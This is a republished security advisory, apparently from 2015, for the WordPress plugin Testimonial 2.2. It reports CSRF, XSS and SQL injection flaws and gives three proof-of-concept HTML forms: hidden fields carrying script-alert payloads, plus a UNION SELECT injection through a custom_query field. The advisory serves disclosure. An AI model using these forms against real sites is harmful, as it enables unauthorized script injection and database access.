来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] Details========================程序: Testimonial版本: 2.2类型: Wordpress plugin作者: IndiaNIC缺陷类别:- XSS (CWE-79)- CSRF (CWE-352)- SQL Injection (CWE-89)概述========================......
Details ======================== 程序: Testimonial 版本: 2.2 类型: Wordpress plugin 作者: IndiaNIC 缺陷类别: - XSS (CWE-79) - CSRF (CWE-352) - SQL Injection (CWE-89) 概述 ======================== Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials. This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients. 缺陷 ======================== This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection. 1. Add testimonial form is vulnerable to CSRF and XSS 2. Add listings template is vulnerable to CSRF, XSS and SQLi 3. Add widget template is vulnerable to CSRF and XSS 测试证明 ======================== 1. Add testimonial <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save"> <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="hidden" name="client_country" value="Belgium"> <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>"> <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>"> <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>"> <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>"> <input type="submit" value="Save Testimonial"> </form> 2. Add listings template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template"> <input type="hidden" name="id" value="9"> <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonial" value="5"> <input type="hidden" name="list_per_page" value="5"> <input type="hidden" name="ord_by" value="id"> <input type="hidden" name="ord_type" value="ASC"> <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#"> <input type="hidden" name="show_featured_at" value="top"> <input type="hidden" name="no_of_featured" value="2"> <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}"> <input type="submit" value="Add Template"> </form> 3. Add widget template <form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php"> <input type="hidden" name="action" value="iNIC_testimonial_save_widget"> <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>"> <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>"> <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>"> <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>"> <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>"> <input type="submit" value="Add Template"> </form> 解决方案 ======================== No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com